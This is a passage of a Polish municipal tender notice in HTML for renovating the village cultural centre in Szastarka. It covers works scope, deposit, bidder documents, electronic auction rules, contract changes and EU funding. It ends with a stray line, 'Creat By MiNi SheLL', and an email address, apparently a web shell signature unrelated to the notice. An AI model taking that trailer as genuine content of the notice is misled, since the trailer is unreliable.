1.przebudowa linii  energetycznej  Nn i budowa przyłącza kablowego  do budynku-układanie kabli energetycznych na słupach  betonowych-0,596m,układanie kabli  w rowach -2,682m,złącza kablowe typ ZK1a 299A-kpl.skrzynki i rozdzielnice-kpl.montaż uziomów poziomych -2,98m,demontaż przyłączy napowietrznych z przewodów nieizolowanych z wejściem na słup,demontaż słupów żelbetowych linii nn pojedynczych i rozkracznych,montaz i stawianie słupów wirowanych jednożerdziowych z ustojem prefabrykowanym linii napowietrznej nn o dłg.żerdzi 12,0m,montaż przewodów  o przekroju do 50 mm2- dla nn-0,013km, szczegółowy opis w przedmiarze robót,

L. ROBOTY  BRANŻY  SANITARNEJ 
1. wykonanie zbiornika na ścieki- szczegółowy opis w przedmiarze robót-zbiornik wspólny dla cz.wdk i osp.

Inne wymagania, które należy wykonać:
- inwentaryzację geodezyjną powykonawczą należy dołączyć na dzień końcowego odbioru robót
-dokumentację po wykonaniu robót  wraz z atestami, certyfikatami  itp. wbudowanych
  materiałów budowlanych, protokoły robót zanikowych, badań itp.    
-przywrócenie placu budowy do stanu pierwotnego,
- zaleca się, żeby Wykonawcy obejrzeli obiekt  w  terenie, w celu dokonania oceny dokumentów   i informacji przekazywanych w ramach przedmiotowego postępowania przez  Zamawiającego,
- z należytą starannością, 
- terminowo..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.20.00.00-9, 45.30.00.00-0, 45.31.00.00-3, 45.31.10.00-0, 45.33.10.00-1, 45.33.00.00-3, 45.40.00.00-1.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1) Przystępując do postępowania wykonawca zobowiązany jest wnieść wadium przetargowe w wysokości 5 000 zł (słownie złotych: pięć tysięcy 00/100). Wadium należy wnieść przed upływem terminu składania wniosków. 2) Wadium może być wnoszone w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( tekst jedn. z 2007 r. Dz. U. Nr 42,poz.275 ze zm.). 3) Wadium wnoszone w pieniądzu należy przelać na konto BS Ziemi Kraśnickiej O/Szastarka  - nr rachunku: 57871710772007700039710021  4) Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania rachunku bankowego zamawiającego. 5) Wadium wnoszone w formie innej niż pieniężna należy złożyć w formie oryginału w księgowości Zamawiającego, pokój nr  9, przed terminem składania wniosków, natomiast do wniosku należy załączyć kopię potwierdzoną za zgodność z oryginałem. 6) Zwrot wadium przetargowego nastąpi zgodnie z art. 46 Pzp. 7) Zamawiający zatrzymuje wadium jeżeli wystąpią przesłanki określone w art. 46 ust. 5 Pzp oraz jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu. (Podstawa prawna art. 26 ust. 3 oraz 46 ust. 4a Pzp).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu spełnienia tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-oświadczenie o spełnianiu przez wykonawcę  wymaganych warunków określonych art.22 ust.1 ustawy z dnia 29 stycznia 2004 roku-Prawo zamówień  publicznych zał.nr.2 
oświadczenie, że osoby, wymienione w załączniku nr 7 do opisu, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia zgodne z  Prawem budowlanym zał.nr.6 do opisu 
-pełnomocnictwo dla lidera podmiotów występujących wspólnie pełnomocnictwo do reprezentowania wykonawcy w niniejszym zamówieniu, jeżeli wymieniona osoba osoby nie została wskazana do reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej,
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania. Dokument pełnomocnictwa powinien zostać podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym Wykonawcę pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli.
-kserokopię dowodu  wniesienia  wadium                                                                                            
-lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej zał.nr.5                                                                                                       -wykonawca, który wylicytuje  najkorzystniejszą cenę, przed podpisaniem umowy przedłoży Zamawiającemu kosztorys ofertowy oraz zestawienie rzeczowo-finansowe na przedmiot zamówienia,                                                                                                  -udzieli Zamawiającemu gwarancji na przedmiot zamówienia, na okres  min.36 miesięcy,licząc od daty sporządzenia  końcowego protokołu odbioru robót.
Dokumenty wymagane w niniejszym ogłoszeniu muszą być przedstawione w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę tj. osobę y uprawnioną lub upełnomocnioną do reprezentowania.





Ocena spełnienia  warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty  wymienione wyżej złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku: spełnia lub nie spełnia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na  podstawie której dokonano wyboru wykonawcy
Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian
1.Strony przewidują następujące rodzaje i warunki zmiany treści umowy
1 zmniejszenie zakresu przedmiotu zamówienia, gdy wykonanie pierwotnego zakresu nie leży w interesie Zamawiającego - w granicach uzasadnionego interesu Zamawiającego z jednoczesnym zmniejszeniem wynagrodzenia określonego w umowie,
2) zmiana terminu realizacji przedmiotu zamówienia, w przypadku: 
a)działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie - o okres niezbędny do usunięcia  skutków działania siły wyższej,
b)błędów w dokumentacji projektowej, których usunięcie będzie poprzedzać konieczność konsultacji z projektantem i naniesienia przez niego poprawek lub zmian w projekcie - o okres nanoszenia  tych poprawek lub zmian w projekcie,
c) gdy zachowanie pierwotnego terminu nie leży w interesie Zamawiającego -  o czas proporcjonalny do zmniejszonego zakresu,
d) wydłużenia terminów dostaw materiałów z przyczyn niezależnych od Wykonawcy - o okres wydłużenia terminów dostaw materiałów,
e) konieczności wykonania dodatkowych badań i ekspertyz - o czas niezbędny do ich wykonania, 
f) konieczności wykonania prac lub badań geologicznych, archeologicznych lub terenowych, w szczególności: niewypały i niewybuchy powodujących konieczność wstrzymania robót objętych  umową - o okres niezbędny do wykonania prac lub badań, gdy Zamawiający dołożył należytej staranności do przygotowanej dokumentacji projektowej,
g) realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, powodującego  konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań - 
o okres niezbędny do wykonania prac powiązanych z przedmiotem niniejszej umowy realizowanych w drodze odrębnej umowy,
h) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych
technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
3) zmiana stawki i kwoty podatku VAT, określonego w wynagrodzeniu brutto - stawka i kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie odpowiednio do przepisów wprowadzających zmiany. 
2.Wszelkie zmiany postanowień Umowy wymagają formy pisemnej pod rygorem nieważności.
3.Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę i nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 
4.Strona, która występuje z propozycją zmiany, w oparciu o przedstawiony powyżej katalog zmian umowy zobowiązana jest do sporządzenia i uzasadnienia wniosku o taką zmianę,(projekt umowy zał.nr.8)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://licytacje.uzp.gov.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.gminaszastarka.pl/bip/przetargi</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> Wykonawcydopuszczeni do udziału w licytacji elektronicznej zostaną zaproszeni do składania ofert a ich dane zostaną przesłane do Urzędu Zamówień Publicznych na platformę do prowadzenia licytacji elektronicznych znajdującą się pod adresem http://licytacje.uzp.gov.pl Korzystanie z oprogramowania jest bezpłatne. Jedynym warunkiem jest zarejestrowanie się w systemie jako Wykonawca. Wykonawca, aby umożliwić Zamawiającemu dopuszczenie go do udziału w licytacji, winien zarejestrować się w tym systemie przed wysłaniem wniosku o dopuszczenie do udziału w licytacji, a wraz z powyższym wnioskiem winien przekazać Zamawiającemu informację o swoim loginie (identyfikatorze). Pomoc w sposobie rejestracji i odpowiedzi na ewentualne problemy znajdują się w Menu na głównej stronie platformy licytacji w zakładce - Samouczek. Wymagania techniczne - komputer klasy PC (lub równoważny) z systemem Windows lub Linux podłączony do sieci Internet, - zainstalowana przeglądarka  MS Internet Explorer w wersji 6.0 lub wyższej albo Mozilla Firefox w wersji 2.0 lub wyższej..</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1.Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę brutto, 2. W toku licytacji elektronicznej Wykonawcy składają kolejne korzystniejsze postąpienia. Możliwość złożenia postąpienia istnieje od otwarcia licytacji do jej zamknięcia. 3.Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą. 4. W toku licytacji Wykonawcy proponują rzeczywistą cenę oferty brutto wyrażoną w złotych oraz ewentualnie w groszach; grosze należy oddzielić od złotych kropką,  5. Oferta złożona przez Wykonawcę winna być niższa od oferty najkorzystniejszej co najmniej o kwotę minimalnego postąpienia. 6.Zamawiajacy przyjął  minimalne  postąpienie (minimalna różnica między kolejnymi ofertami) wartość   40.000 zł brutto. 7. Licytacja elektroniczna rozpoczyna się od ceny wywoławczej   1 854 165.05 zł brutto.  8. W toku licytacji Zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, a także o cenach złożonych ofert, z tym że do momentu zamknięcia licytacji nie ujawni informacji umożliwiających identyfikację Wykonawców.</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 120 minut</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 31.05.2013 godzina 10:00, miejsce: Urząd Gminy Szastarka,23-225 Szastarka,  w sekretariacie, pokój nr.11.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> Otwarcie licytacji elektronicznej nastąpi nie  wcześniej niż 5  dni od dnia przekazania zaproszenia do udziału w licytacji, o godzinie 10-siątej.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Licytacja elektroniczna  na Remont i wykończenie świetlicy Wiejskiego Domu Kultury     w Szastarce Stacji  będzie licytacją jednoetapową i zakończy się po upływie 120 minut
od momentu jej otwarcia.</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>1. Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy, które służyć będzie pokryciu roszczeń z tytułu niewykonania lub nienależytego umowy, a jeżeli wykonawca jest jednocześnie gwarantem również pokryciu roszczeń z tytułu gwarancji jakości. 2. Od wykonawcy, którego oferta zostanie uznana jako najkorzystniejsza wymagane będzie wniesienie przed podpisaniem umowy zabezpieczenia należytego wykonania umowy w wysokości 10 % ceny ofertowej przedstawionej przez Wykonawcę. 3. Zabezpieczenie należytego wykonania umowy wnoszone jest w jednej lub kilku następujących formach: - w pieniądzu, przelewem na rachunek bankowy zamawiającego - w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym, - w gwarancjach bankowych, - w gwarancjach ubezpieczeniowych - w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Istotne dla stron postanowienia umowy zawarte są w jej projekcie, będącym załącznikiem  nr 8 do niniejszego ogłoszenia, zamieszczonym na stronie internetowej Zamawiającego www.gminaszastarka.pl/bip/ w zakładce przetargi.</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich, Odnowa i rozwój wsi działanie 313,322,323..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com